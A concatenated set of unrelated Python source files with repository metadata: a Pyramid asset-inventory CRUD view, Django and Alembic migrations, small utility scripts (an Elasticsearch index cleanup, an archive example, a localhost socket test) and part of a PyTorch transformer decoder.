colander.String(),
widget=widget.SelectWidget(values=beton),
#missing = colander.drop,
default = 'Tidak',
oid="f_beton_tidak",
title="Beton")
f_panjang = colander.SchemaNode(
colander.Integer(),
missing = colander.drop,
title="Panjang")
f_lebar = colander.SchemaNode(
colander.Integer(),
missing = colander.drop,
title="Lebar")
f_luas_lantai = colander.SchemaNode(
colander.Integer(),
missing = colander.drop,
title="L. Lantai")
f_lokasi = colander.SchemaNode(
colander.String(),
missing = colander.drop,
title="Lokasi")
f_dokumen_tanggal = colander.SchemaNode(
colander.Date(),
missing = colander.drop,
title="Tgl. Dok")
f_dokumen_nomor = colander.SchemaNode(
colander.String(),
missing = colander.drop,
title="No. Dok")
f_status_tanah = colander.SchemaNode(
colander.String(),
missing = colander.drop,
title="Sts. Tanah")
f_kode_tanah = colander.SchemaNode(
colander.String(),
missing = colander.drop,
title="Kd. Tanah")
f_luas_bangunan = colander.SchemaNode(
colander.Integer(),
missing = colander.drop,
title="L.Bangunan")
class EditSchema(AddSchema):
id = colander.SchemaNode(colander.String(),
missing=colander.drop,
widget=widget.HiddenWidget(readonly=True))
class view_aset_kibf(BaseViews):
# MASTER
@view_config(route_name="aset-kibf", renderer="templates/kibs/list.pt",
permission="read")
def aset_kibf(self):
params = self.request.params
return dict(kib='kibf')
@view_config(route_name="aset-kibf-act", renderer="json",
permission="read")
def aset_kibf_act(self):
ses = self.request.session
req = self.request
params = req.params
url_dict = req.matchdict
pk_id = 'id' in params and int(params['id']) or 0
if url_dict['act']=='grid':
# defining columns
columns = []
columns.append(ColumnDT('id'))
columns.append(ColumnDT('units.kode'))
columns.append(ColumnDT('units.nama'))
columns.append(ColumnDT('kats.kode'))
columns.append(ColumnDT('no_register'))
#columns.append(ColumnDT('uraian'))
columns.append(ColumnDT('kats.uraian'))
#columns.append(ColumnDT('tahun'))
columns.append(ColumnDT('tgl_perolehan', filter=self._DTstrftime))
columns.append(ColumnDT('th_beli'))
columns.append(ColumnDT('harga'))
columns.append(ColumnDT('kondisi'))
query = DBSession.query(AsetKib).\
join(AsetKategori, Unit).\
filter(AsetKib.unit_id == Unit.id,
#AsetKib.unit_id == ses['unit_id'],
AsetKib.kategori_id==AsetKategori.id,
AsetKib.kib=='F',
func.substr(Unit.kode,1,func.length(ses['unit_kd']))==ses['unit_kd'],
or_(AsetKib.disabled=='0',AsetKib.disabled==None))
rowTable = DataTables(req, AsetKib, query, columns)
return rowTable.output_result()
#######
# Add #
#######
def form_validator(self, form, value):
if 'id' in form.request.matchdict:
uid = form.request.matchdict['id']
q = DBSession.query(AsetKib).filter_by(id=uid)
kebijakan = q.first()
else:
kebijakan = None
def get_form(self, class_form, row=None):
schema = class_form(validator=self.form_validator)
schema = schema.bind()
schema.request = self.request
if row:
schema.deserialize(row)
return Form(schema, buttons=('simpan','batal'))
def save(self, values, user, row=None):
if not row:
row = AsetKib()
row.created = datetime.now()
row.create_uid = user.id
row.from_dict(values)
row.updated = datetime.now()
row.update_uid = user.id
row.disabled = 'disabled' in values and values['disabled'] and 1 or 0
a = row.tahun
b = row.unit_id
c = row.kategori_id
if not row.no_register:
row.no_register = AsetKib.get_no_register(a,b,c)+1;
row.jumlah=1
DBSession.add(row)
DBSession.flush()
return row
def save_request(self, values, row=None):
if 'id' in self.request.matchdict:
values['id'] = self.request.matchdict['id']
row = self.save(values, self.request.user, row)
self.request.session.flash('KIB sudah disimpan.')
def route_list(self):
return HTTPFound(location=self.request.route_url('aset-kibf'))
def session_failed(self, session_name):
r = dict(form=self.session[session_name])
del self.session[session_name]
return r
@view_config(route_name='aset-kibf-add', renderer='templates/kibs/add_kibf.pt',
permission='add')
def view_kebijakan_add(self):
req = self.request
ses = self.session
form = self.get_form(AddSchema)
if req.POST:
if 'simpan' in req.POST:
controls = req.POST.items()
controls_dicted = dict(controls)
# Ambil value data
units_id = controls_dicted['unit_id']
units_nama = controls_dicted['unit_nm']
units_kode = controls_dicted['unit_kd']
kats_id = controls_dicted['kategori_id']
kats_kode = controls_dicted['kategori_kd']
kats_uraian = controls_dicted['kategori_nm']
no_register = controls_dicted['no_register']
pemiliks_id = controls_dicted['pemilik_id']
pemiliks_uraian = controls_dicted['pemilik_nm']
masa_manfaat = controls_dicted['masa_manfaat']
#uraian = controls_dicted['uraian']
tahun = controls_dicted['tahun']
tgl_perolehan = controls_dicted['tgl_perolehan']
#cara_perolehan = controls_dicted['cara_perolehan']
th_beli = controls_dicted['th_beli']
asal_usul = controls_dicted['asal_usul']
harga = controls_dicted['harga']
# Ambil jumlah
jml = controls_dicted['jumlah']
jmlh = "%s" % jml
jumlah = int(jmlh)
controls_dicted['jumlah'] = 1
satuan = controls_dicted['satuan']
kondisi = controls_dicted['kondisi']
keterangan = controls_dicted['keterangan']
kib = controls_dicted['kib']
f_bertingkat_tidak = controls_dicted['f_bertingkat_tidak']
f_beton_tidak = controls_dicted['f_beton_tidak']
f_panjang = controls_dicted['f_panjang']
f_lebar = controls_dicted['f_lebar']
f_luas_lantai = controls_dicted['f_luas_lantai']
f_lokasi = controls_dicted['f_lokasi']
f_dokumen_tanggal = controls_dicted['f_dokumen_tanggal']
f_dokumen_nomor = controls_dicted['f_dokumen_nomor']
f_status_tanah = controls_dicted['f_status_tanah']
f_kode_tanah = controls_dicted['f_kode_tanah']
f_luas_bangunan = controls_dicted['f_luas_bangunan']
try:
c = form.validate(controls)
except ValidationFailure, e:
return dict(form=form, kat_prefix=KAT_PREFIX)
row = self.save_request(dict(controls))
# Array insert sesuai jumlah
a = jumlah - 1
b = 0
for b in range (0,a):
aset = AsetKib()
aset.unit_id = units_id
aset.kategori_id = kats_id
aset.pemilik_id = pemiliks_id
#aset.uraian = uraian
aset.tahun = tahun
aset.no_register = AsetKib.get_no_register(tahun,units_id,kats_id)+1;
aset.tgl_perolehan = tgl_perolehan
#aset.cara_perolehan = cara_perolehan
aset.th_beli = th_beli
aset.asal_usul = asal_usul
aset.harga = harga
aset.jumlah = 1
aset.satuan = satuan
aset.kondisi = kondisi
aset.keterangan = keterangan
aset.kib = kib
aset.masa_manfaat = masa_manfaat
aset.f_bertingkat_tidak = f_bertingkat_tidak
aset.f_beton_tidak = f_beton_tidak
aset.f_panjang = f_panjang
aset.f_lebar = f_lebar
aset.f_luas_lantai = f_luas_lantai
aset.f_lokasi = f_lokasi
aset.f_dokumen_tanggal = f_dokumen_tanggal
aset.f_dokumen_nomor = f_dokumen_nomor
aset.f_status_tanah = f_status_tanah
aset.f_kode_tanah = f_kode_tanah
aset.f_luas_bangunan = f_luas_bangunan
DBSession.add(aset)
DBSession.flush()
return self.route_list()
elif SESS_ADD_FAILED in req.session:
return self.session_failed(SESS_ADD_FAILED)
return dict(form=form, kat_prefix=KAT_PREFIX)
########
# Edit #
########
def query_id(self):
return DBSession.query(AsetKib).filter_by(id=self.request.matchdict['id'])
def id_not_found(self):
msg = 'KIB ID %s Tidak Ditemukan.' % self.request.matchdict['id']
request.session.flash(msg, 'error')
return route_list()
@view_config(route_name='aset-kibf-edit', renderer='templates/kibs/add_kibf.pt',
permission='edit')
def view_kebijakan_edit(self):
request = self.request
row = self.query_id().first()
if not row:
return id_not_found(request)
rowd={}
rowd['id'] = row.id
rowd['unit_id'] = row.units.id
rowd['unit_nm'] = row.units.nama
rowd['unit_kd'] = row.units.kode
rowd['kategori_id'] = row.kats.id
rowd['kategori_kd'] = row.kats.kode
rowd['kategori_nm'] = row.kats.uraian
rowd['no_register'] = row.no_register
rowd['pemilik_id'] = row.pemiliks.id
rowd['pemilik_nm'] = row.pemiliks.uraian
#rowd['uraian'] = row.uraian
rowd['tgl_perolehan'] = row.tgl_perolehan
#rowd['cara_perolehan'] = row.cara_perolehan
rowd['th_beli'] = row.th_beli
rowd['asal_usul'] = row.asal_usul
rowd['harga'] = row.harga
rowd['jumlah'] = row.jumlah
rowd['satuan'] = row.satuan
rowd['kondisi'] = row.kondisi
rowd['keterangan'] = row.keterangan
#rowd['masa_manfaat'] = row.masa_manfaat
if row.masa_manfaat == None :
rowd['masa_manfaat'] = 0
else :
rowd['masa_manfaat'] = row.masa_manfaat
rowd['kib'] = row.kib
#rowd['f_bertingkat_tidak'] = row.f_bertingkat_tidak
if row.f_bertingkat_tidak==None:
rowd['f_bertingkat_tidak'] = 'Tidak'
else :
rowd['f_bertingkat_tidak'] = row.f_bertingkat_tidak
#rowd['f_beton_tidak'] = row.f_beton_tidak
if row.f_beton_tidak==None:
rowd['f_beton_tidak'] = 'Tidak'
else :
rowd['f_beton_tidak'] = row.f_beton_tidak
#rowd['f_panjang'] = row.f_panjang
if row.f_panjang == None :
rowd['f_panjang'] = 0
else :
rowd['f_panjang'] = row.f_panjang
#rowd['f_lebar'] = row.f_lebar
if row.f_lebar == None :
rowd['f_lebar'] = 0
else :
rowd['f_lebar'] = row.f_lebar
#rowd['f_luas_lantai'] = row.f_luas_lantai
if row.f_luas_lantai == None :
rowd['f_luas_lantai'] = 0
else :
rowd['f_luas_lantai'] = row.f_luas_lantai
rowd['f_lokasi'] = row.f_lokasi
rowd['f_dokumen_tanggal'] = row.f_dokumen_tanggal
rowd['f_dokumen_nomor'] = row.f_dokumen_nomor
rowd['f_status_tanah'] = row.f_status_tanah
rowd['f_kode_tanah'] = row.f_kode_tanah
#rowd['f_luas_bangunan'] = row.f_luas_bangunan
if row.f_luas_bangunan == None :
rowd['f_luas_bangunan'] = 0
else :
rowd['f_luas_bangunan'] = row.f_luas_bangunan
form = self.get_form(EditSchema)
form.set_appstruct(rowd)
if request.POST:
if 'simpan' in request.POST:
controls = request.POST.items()
try:
c = form.validate(controls)
except ValidationFailure, e:
return dict(form=form)
self.save_request(dict(controls), row)
return self.route_list()
elif SESS_EDIT_FAILED in request.session:
return self.session_failed(SESS_EDIT_FAILED)
return dict(form=form)
##########
# Delete #
##########
@view_config(route_name='aset-kibf-delete', renderer='templates/kibs/delete.pt',
permission='delete')
def view_delete(self):
request = self.request
q = self.query_id()
row = q.first()
if not row:
return self.id_not_found(request)
form = Form(colander.Schema(), buttons=('hapus','batal'))
if request.POST:
if 'hapus' in request.POST:
msg = 'KIB ID %d %s sudah dihapus.' % (row.id, row.kats.uraian)
try:
q.delete()
DBSession.flush()
except:
msg = 'KIB ID %d %s tidak dapat dihapus.' % (row.id, row.kats.uraian)
request.session.flash(msg)
return self.route_list()
return dict(row=row,form=form.render())
##########
# CSV #
##########
@view_config(route_name='aset-kibf-csv', renderer='csv',
permission='read')
def export_csv(self):
request = self.request
ses = self.request.session
query = DBSession.query(Unit.kode.label('Kode_Unit'), Unit.nama.label('Nama_Unit'),
AsetKategori.kode.label('Kode_Kategori'), AsetKib.no_register.label('No_Register'), AsetKategori.uraian.label('Nama_Kategori'),
AsetPemilik.uraian.label('Pemilik'), AsetKib.keterangan.label('Keterangan'),
AsetKib.tgl_perolehan.label('Tgl_Perolehan'), AsetKib.asal_usul.label('Asal_Usul'), AsetKib.harga.label('Harga'),
AsetKib.jumlah.label('Jumlah'), AsetKib.kondisi.label('Kondisi'), AsetKib.kib.label('Kib'), AsetKib.masa_manfaat.label('Masa_Manfaat'),
AsetKib.f_bertingkat_tidak.label('Bertingkat/Tidak'), AsetKib.f_beton_tidak.label('Beton/Tidak'),
AsetKib.f_panjang.label('Panjang'), AsetKib.f_lebar.label('Lebar'), AsetKib.f_luas_lantai.label('Luas_Lantai'),
AsetKib.f_luas_bangunan.label('Luas_Bangunan'),
AsetKib.f_dokumen_tanggal.label('Tgl_Dokumen'), AsetKib.f_dokumen_nomor.label('No_Dokumen'), AsetKib.f_kode_tanah.label('Kode_Tanah'),
AsetKib.f_status_tanah.label('Status_Tanah')
).filter(AsetKib.unit_id == Unit.id,
AsetKib.pemilik_id == AsetPemilik.id,
AsetKib.kategori_id==AsetKategori.id,
AsetKib.kib=='F',
func.substr(Unit.kode,1,func.length(ses['unit_kd']))==ses['unit_kd'],
or_(AsetKib.disabled=='0',AsetKib.disabled==None)
).order_by(Unit.kode, AsetKategori.kode, AsetKib.no_register
)
r = query.first()
if not r:
request.session.flash('Data tidak ada')
return self.route_list()
header = r.keys()
query = query.all()
rows = []
for item in query:
rows.append(list(item))
# override attributes of response
filename = 'KIB_F%s.csv' % datetime.now().strftime('%Y%m%d%H%M%S')
self.request.response.content_disposition = 'attachment;filename=' + filename
return {
'header': header,
'rows': rows,
}
|
[
"aa.gustiana@gmail.com"
] |
aa.gustiana@gmail.com
|
344d835fca51a69fbe7499ca2800afeda5c9c9cd
|
871387eeab8d9a6de8d6d395b09bae83cdefe497
|
/Flask/migrateDemo/migrations/versions/cdd196201d1e_.py
|
556a4c713f76cf1b90f96cc78996ef941342d22f
|
[] |
no_license
|
huangjichaolucky/python_PyCharm_Use
|
f13e3c46a7f9648c76dba864bdbde5a7ef788ce6
|
f052ec385f3c748bb13dbd2103e07ffd629d8a76
|
refs/heads/master
| 2021-08-19T12:16:28.066253
| 2017-11-26T06:41:01
| 2017-11-26T06:41:01
| 110,697,493
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 636
|
py
|
"""empty message
Revision ID: cdd196201d1e
Revises:
Create Date: 2017-11-23 03:40:48.542867
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'cdd196201d1e'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('article', sa.Column('tag', sa.String(length=100), nullable=False))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('article', 'tag')
# ### end Alembic commands ###
|
[
"781178325@qq.com"
] |
781178325@qq.com
|
445ee8cfc51f5929c0c2dc7ceb6ce75e61128534
|
3b81c00288f62c1c2492bc573945a5547db1644e
|
/Chapter 1/3_Raw String.py
|
a8cb6e1411734ef4abaeb5f9c9170559f2c0d667
|
[] |
no_license
|
sahil4683/python-temp
|
25b00d1a3c736ac65c9d8b18cca971438a34551c
|
130999a394e001f2f2edc827312089576c4c55bd
|
refs/heads/main
| 2023-01-03T17:02:34.195146
| 2020-10-17T16:16:10
| 2020-10-17T16:16:10
| 304,918,177
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 86
|
py
|
print(r"Hello \n \t \b \'\"\ World") #print all text after add r within print funtion
|
[
"sahil4683@gmail.com"
] |
sahil4683@gmail.com
|
127f1bd1dcdc2933fc0764befb9de27bf1b79466
|
d24ea14c01a0e6f23cf7409361cb3437c87e7d86
|
/company_health/api/reports.py
|
6d7b681704f2d8a560bdd057b1dc59be1744fee7
|
[
"MIT"
] |
permissive
|
Korulag/ipz
|
df9be513f8b50a5e148740343d18724b2c159ea3
|
1838aac749915b051ddcac85ec663acf5767def6
|
refs/heads/master
| 2022-09-23T12:10:53.385786
| 2020-06-05T18:00:02
| 2020-06-05T18:00:02
| 254,825,410
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 797
|
py
|
from company_health.api.base import BaseViewSet
from company_health.apps.reports.models import *
from company_health.apps.reports.serializers import *
__all__ = ['CompanyReportViewSet', 'PersonalReportViewSet', 'TeamReportViewSet']
class CompanyReportViewSet(BaseViewSet):
http_method_names = ['delete', 'get', 'post', 'put']
queryset = CompanyReport.objects.all()
serializer_class = CompanyReportSerializer
class PersonalReportViewSet(BaseViewSet):
http_method_names = ['delete', 'get', 'post', 'put']
queryset = PersonalReport.objects.all()
serializer_class = PersonalReportSerializer
class TeamReportViewSet(BaseViewSet):
http_method_names = ['delete', 'get', 'post', 'put']
queryset = TeamReport.objects.all()
serializer_class = TeamReportSerializer
|
[
"kleshev12@gmail.com"
] |
kleshev12@gmail.com
|
8b6e08127dc4d002ee45dc81a4499e737891cf97
|
8abcca39940c4d4194dee185ce097aecbea41498
|
/pyvpnscript/deletedata.py
|
8fcdb198d88e7810a063c28de3c952e3a0263a02
|
[] |
no_license
|
jianqiang08/mypython
|
a0c996177004aa8c4606dd010ccda0d51602aaf1
|
05e8c4faba32c07078eae192992febd4f1151134
|
refs/heads/master
| 2021-08-22T05:58:48.632962
| 2017-11-29T12:25:40
| 2017-11-29T12:25:40
| 112,471,611
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 374
|
py
|
import elasticsearch
es = elasticsearch.Elasticsearch('172.16.37.40:9200')
query_string = r'{ "query": { "match_all": {} }}'
res = es.delete_by_query(index='vpn', doc_type='user_info', body=query_string)
#es.delete_by_query(index='vpn', doc_type='start_used_vpn', body=query_string)
#es.delete_by_query(index='vpn', doc_type='used_vpn', body=query_string)
print(res)
|
[
"wangjianqiang@wangjianqiangdeMacBook-Pro.local"
] |
wangjianqiang@wangjianqiangdeMacBook-Pro.local
|
55e3da8c06e8129796c1baa879af437badd6dc66
|
bc531b7d1819ca5b8ba9d42395ce9e4676978fe1
|
/Chapter06/shutil_make_archive.py
|
3b5afb43200df5f36605743570ee4cb47e8813f5
|
[
"MIT"
] |
permissive
|
PacktPublishing/Mastering-Python-Scripting-for-System-Administrators-
|
b72cacd9c54a3d9ec49100b2e5a49532960d58cc
|
d6ad3ea82ff503083176808166f727f52b187325
|
refs/heads/master
| 2023-01-27T19:56:06.109090
| 2023-01-18T09:00:19
| 2023-01-18T09:00:19
| 161,440,105
| 175
| 216
|
MIT
| 2022-10-08T19:33:46
| 2018-12-12T06:00:41
|
Python
|
UTF-8
|
Python
| false
| false
| 243
|
py
|
import tarfile
import shutil
import sys
shutil.make_archive(
'work', 'gztar',
root_dir='..',
base_dir='work',
)
print('\nArchive contents:')
with tarfile.open('work.tar.gz', 'r') as t_file:
for names in t_file.getnames():
print(names)
|
[
"noreply@github.com"
] |
PacktPublishing.noreply@github.com
|
4d98551f6376e47a37a8e3b79cbdf27bfa24a014
|
ced0efb0666b5817b9656cd533cf6f5db0085fe8
|
/py/server/nc.py
|
68467db2e7ae3bb3b99f16c505e41e525d8938ae
|
[] |
no_license
|
adithyaphilip/learning
|
11fb6997ab3d613a358502dfff0ae9b91cd5ee27
|
64ecd3bc622077c7256df91cdf4dfbc8adf23068
|
refs/heads/master
| 2021-06-01T18:04:46.733092
| 2016-09-22T18:22:46
| 2016-09-22T18:22:46
| 68,949,350
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 303
|
py
|
import socket
from threading import Thread
from time import sleep
port = int(input())
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Thread(target = s.connect, args = (("localhost", port),)).start()
#s.send("hello".encode("utf-8"))
sleep(1)
print("lol")
s.close()
|
[
"adithyaphilip@gmail.com"
] |
adithyaphilip@gmail.com
|
8ff97c12f5fc42f8f0828de216d82d8fa23977e3
|
865f08db5ebb42f13b00c467345121566bd8fa78
|
/teacherview/migrations/0009_status_log_in_check.py
|
87c5774fdf953854334834785bdfd249c39ffb86
|
[] |
no_license
|
eventdips/eventdips-django
|
e872d318e24b698e41f4622fe765f11bb9f2410e
|
7c020014fb6076cf3ed84803bdefbb2fe2636155
|
refs/heads/master
| 2022-12-11T05:52:27.251584
| 2020-07-25T11:08:45
| 2020-07-25T11:08:45
| 232,338,576
| 0
| 1
| null | 2022-11-23T11:37:44
| 2020-01-07T14:10:55
|
HTML
|
UTF-8
|
Python
| false
| false
| 406
|
py
|
# Generated by Django 2.2.4 on 2019-10-19 11:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('teacherview', '0008_auto_20191018_1503'),
]
operations = [
migrations.AddField(
model_name='status',
name='log_in_check',
field=models.CharField(default='R', max_length=1),
),
]
|
[
"aayushdani1@gmail.com"
] |
aayushdani1@gmail.com
|
8c4dbbf88d04a891287f2d8658b3049e75620570
|
fe8bc976b7a7c6cf428ce25b4ddd5507125176af
|
/util_transformer.py
|
2e7a643ed6246fdacb5e43c2b2a07a0042b54c2e
|
[] |
no_license
|
asahi417/pytorch-language-model
|
0b257035e44611f65da041da1bf00f0e4511d296
|
c5089ca174cb64b89e3898d42bf1508bfa91e532
|
refs/heads/master
| 2022-11-27T05:04:53.529252
| 2020-07-16T06:17:05
| 2020-07-16T06:17:05
| 233,868,353
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 19,371
|
py
|
""" pytorch transformer decoder implementation """
import math
import torch
import torch.nn as nn
__all__ = [
"PositionalEmbedding",
"Conv1D",
"PointwiseFeedForward",
"SelfMaskedAttention",
"TransformerBlock",
"TransformerDecoder",
]
EPS = 1e-5 # numeric stability for division
EPS_LAYER_NORM = 1e-5 # numeric stability for layernorm
CLAMP_EXP = 15 # to avoid exploding exponentiation
class PositionalEmbedding(nn.Module):
def __init__(self, n_emb):
super().__init__()
self.register_buffer('inv_freq', 1 / (10000 ** (torch.arange(0.0, n_emb, 2.0) / n_emb)))
def forward(self, pos_seq):
""" positional embedding
Parameter
-----------
pos_seq: 1-D tensor including sequence of relative position
"""
sinusoid_inp = torch.ger(pos_seq, self.inv_freq)
pos_emb = torch.cat([sinusoid_inp.sin(), sinusoid_inp.cos()], dim=-1)
return pos_emb
class Conv1D(nn.Module):
""" 1d convolution """
def __init__(self,
n_input: int,
n_output: int):
""" 1d convolution
Parameter
-----------
n_input: int
input dimension
n_output: int
output dimension
"""
super().__init__()
self.__n_input = n_input
self.__n_output = n_output
self.linear = nn.Linear(self.__n_input, self.__n_output)
self.linear.weight.data.normal_(std=0.02)
def forward(self, x):
""" module output
Parameter
-------------
x: tensor (batch, sequence, input_dim)
Return
-------------
x: tensor (batch, sequence, output_dim)
"""
batch, seq, input_dim = x.size()
assert input_dim == self.__n_input
x = x.view(-1, self.__n_input)
x = self.linear(x)
x = x.view(batch, seq, self.__n_output)
return x
class PointwiseFeedForward(nn.Module):
""" point-wise feed forward network (1d conv -> gelu -> 1d conv)"""
def __init__(self,
n_embedding: int,
n_state_ffn: int):
""" point-wise feed forward network (1d conv -> gelu -> 1d conv)
Parameter
--------------
n_embedding: int
embedding dimension
n_state_ffn: int
intermediate state dimension
"""
super().__init__()
self.__n_state_ffn = n_state_ffn
self.__n_embedding = n_embedding
self.linear_1 = Conv1D(self.__n_embedding, self.__n_state_ffn)
self.linear_2 = Conv1D(self.__n_state_ffn, self.__n_embedding)
def forward(self, x):
""" module output
Parameter
-------------
x: tensor (batch, sequence, input_dim)
Return
-------------
x: tensor (batch, sequence, input_dim)
"""
x = self.linear_1(x)
x = self.gelu(x)
x = self.linear_2(x)
return x
@staticmethod
def gelu(x):
return 0.5 * x * (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))
class SelfMaskedAttention(nn.Module):
""" masked multiheads self (causal) attention module """
def __init__(self,
n_embedding: int,
n_head: int,
dropout_attention: float,
dropout_residual: float,
n_context: int,
n_positional_embedding: int):
""" masked multi-heads self (causal) attention module with caching
Parameter
-------------
n_embedding: int
embedding dimension
n_head: int
number of attention head
dropout_attention: float
dropout_residual: float
"""
super().__init__()
assert n_embedding % n_head == 0
self.linear_qkv = Conv1D(n_embedding, n_embedding * 3) # 1d conv to get qkv once
self.linear_heads = Conv1D(n_embedding, n_embedding)
self.dropout_attention = nn.Dropout(dropout_attention)
self.dropout_residual = nn.Dropout(dropout_residual)
self.register_buffer(
'mask',
torch.tensor([[int(r <= c) for r in range(n_context)] for c in range(n_context)], dtype=torch.float))
self.n_embedding = n_embedding
self.n_head = n_head
self.n_context = n_context
if n_positional_embedding:
self.linear_position = Conv1D(n_positional_embedding, n_embedding)
else:
self.linear_position = None
def query_key_value(self, x, cached_key_value: list = None):
""" get query/key/value vector for each head
Parameter
------------
x: tensor (batch, seq, dim)
cached_key_value: list of two tensors (batch, n_head, dim / n_head, cached_seq), [cached_key, cached_value]
Return
------------
q: tensor (batch, self.n_head, seq, dim / self.n_head)
v: tensor (batch, self.n_head, seq + cached_seq, dim / self.n_head)
k: tensor (batch, self.n_head, dim / self.n_head, seq + cached_seq)
* `cached_seq` is zero if cached_key_value is None.
"""
def __split_into_heads(tensor):
n_batch, n_seq, n_dim = tensor.size()
assert n_dim == self.n_embedding
tensor = tensor.view(n_batch, n_seq, self.n_head, int(self.n_embedding / self.n_head))
tensor = tensor.permute(0, 2, 1, 3).contiguous()
return tensor
qkv = self.linear_qkv(x) # batch, seq, n_dim * 3
q, k, v = torch.split(qkv, self.n_embedding, dim=-1) # (batch, seq, n_dim) x 3
q = __split_into_heads(q)
v = __split_into_heads(v)
k = __split_into_heads(k)
k = k.permute(0, 1, 3, 2).contiguous()
if cached_key_value is not None:
cached_k, cached_v = cached_key_value
assert list(k.size())[:-1] == list(cached_k.size())[:-1]
assert list(v.permute(0, 1, 3, 2).size())[:-1] == list(cached_v.permute(0, 1, 3, 2).size())[:-1]
v = torch.cat([cached_v, v], dim=2)
k = torch.cat([cached_k, k], dim=3)
return q, k, v
def masked_attention_weight(self, q, k,
r_position_embedding=None,
r_content_bias=None,
r_position_bias=None):
""" causal mask attention weight by lower triangular mask
[[1., 0., 0., 0., 0.],
[1., 1., 0., 0., 0.],
[1., 1., 1., 0., 0.],
[1., 1., 1., 1., 0.],
[1., 1., 1., 1., 1.]]
Parameter
-----------
q: tensor (batch, self.n_head, seq, dim / self.n_head)
k: tensor (batch, self.n_head, dim / self.n_head, seq + cached_seq)
r_position_embedding: tensor (seq + cached_seq, n_pos_dim)
Return
-----------
att_weight: tensor (batch, head, seq, seq + cache)
3rd axis is attended, and 4th is attending
"""
att_weight = torch.matmul(q, k)
batch, n_head, seq_attended, seq_attending = att_weight.size()
cached_len = seq_attending - seq_attended
assert self.n_head == n_head
assert self.n_context == seq_attended
if self.linear_position:
assert r_position_embedding is not None
assert r_content_bias is not None
assert r_position_bias is not None
assert cached_len >= 0
# attended, attending, n_pos_emb
rel_pos = torch.stack(
[torch.stack([r_position_embedding[int(max(0, c - r)), :].contiguous()
for r in range(-cached_len, self.n_context)])
for c in range(self.n_context)])
# attended, attending, n_emb
rel_pos = self.linear_position(rel_pos)
_dim = int(self.n_embedding / self.n_head)
# 1, attended, attending, n_head, n_emb/n_head, 1
rel_pos = rel_pos.view(1, self.n_context, seq_attending, self.n_head, _dim, 1)
# 1, n_head, attended, attending, n_emb/n_head, 1
rel_pos = rel_pos.permute(0, 3, 1, 2, 4, 5).contiguous()
#######
# (b) #
#######
# batch, n_head, attended, 1, 1, dim / self.n_head)
_q = q.view(batch, self.n_head, self.n_context, 1, 1, _dim)
# batch, n_head, attended, attending
att_weight_new = torch.matmul(_q, rel_pos)
assert att_weight_new.size(-1) == 1 and att_weight_new.size(-2) == 1
att_weight_new = att_weight_new[:, :, :, :, 0, 0].contiguous()
assert att_weight.shape == att_weight_new.shape
att_weight = att_weight_new + att_weight
#######
# (c) #
#######
_r_content_bias = r_content_bias.view(1, self.n_head, 1, 1, 1, _dim)
# batch, n_head, attended, attending
att_weight_new = torch.matmul(_r_content_bias, rel_pos)
assert att_weight_new.size(-1) == 1 and att_weight_new.size(-2) == 1 and att_weight_new.size(0) == 1
att_weight_new = att_weight_new[:, :, :, :, 0, 0].contiguous()
assert att_weight.shape[1:4] == att_weight_new.shape[1:4]
att_weight = att_weight_new + att_weight
#######
# (d) #
#######
_r_position_bias = r_position_bias.view(1, self.n_head, 1, 1, 1, _dim)
# batch, n_head, attended, attending
att_weight_new = torch.matmul(_r_position_bias, rel_pos)
assert att_weight_new.size(-1) == 1 and att_weight_new.size(-2) == 1 and att_weight_new.size(0) == 1
att_weight_new = att_weight_new[:, :, :, :, 0, 0].contiguous()
assert att_weight.shape[1:4] == att_weight_new.shape[1:4]
att_weight = att_weight_new + att_weight
# create mask for causal attention
if cached_len == 0:
mask = self.mask
else:
sub_mask = torch.ones((self.n_context, cached_len), device=self.mask.device, dtype=self.mask.dtype)
mask = torch.cat([sub_mask, self.mask], dim=1)
else:
assert self.n_context == seq_attending and cached_len == 0
mask = self.mask
att_weight = self.masked_softmax(att_weight / math.sqrt(q.size(-1)), mask=mask, dim=-1)
att_weight = self.dropout_attention(att_weight)
return att_weight
@staticmethod
def masked_softmax(vec, mask, dim=1):
""" softmax ignoring zero value: clamp the input to softmax is very important as it gets exploding easily """
vec = torch.clamp(vec.float(), min=-CLAMP_EXP, max=CLAMP_EXP)
exps = torch.exp(vec)
masked_exps = exps * mask.float()
masked_sums = masked_exps.sum(dim, keepdim=True)
return masked_exps / (masked_sums + EPS)
def forward(self,
x,
cached_key_value: list=None,
r_position_embedding=None,
r_content_bias=None,
r_position_bias=None):
""" get attended context vector
Parameter
------------
x: tensor (batch, seq, dim), where the last row x[:, seq, :] is the newest token
cached_key_value: list of two tensors [cached_key, cached_value],
each has (batch, n_head, dim / n_head, cached_seq)
pos_emb: tensor (1, seq + cached_seq, n_pos_dim)
Return
------------
context_vector: tensor (batch, seq, dim)
(k, v): `key` tensor (batch, head, dim/head, seq + cache_size) and
`value` tensor (batch, head, seq + cache_size, dim/head)
"""
q, k, v = self.query_key_value(x, cached_key_value)
# attention mask: batch, head, seq, seq + cache
att_weight = self.masked_attention_weight(q, k, r_position_embedding, r_content_bias, r_position_bias)
# batch, head, seq, dim/head
context_vector = torch.matmul(att_weight, v)
# batch, seq, dim/head, head
context_vector = context_vector.permute(0, 2, 3, 1).contiguous()
# batch, seq, dim
context_vector = context_vector.view(context_vector.size(0), context_vector.size(1), -1)
# merge head and residual dropout
context_vector = self.linear_heads(context_vector)
context_vector = self.dropout_residual(context_vector)
return context_vector, (k, v)
class TransformerBlock(nn.Module):
""" single Transformer Decoder Block """
def __init__(self,
n_embedding: int,
n_state_ffn: int,
n_head: int,
dropout_residual: float,
dropout_attention: float,
n_context: int,
n_positional_embedding: int=None):
""" single Transformer Decoder Block
Parameter
------------
n_embedding: int
embedding dimension
n_state_ffn: int
intermediate state dimension
n_head: int
number of attention head
dropout_residual: float
dropout_attention: float
"""
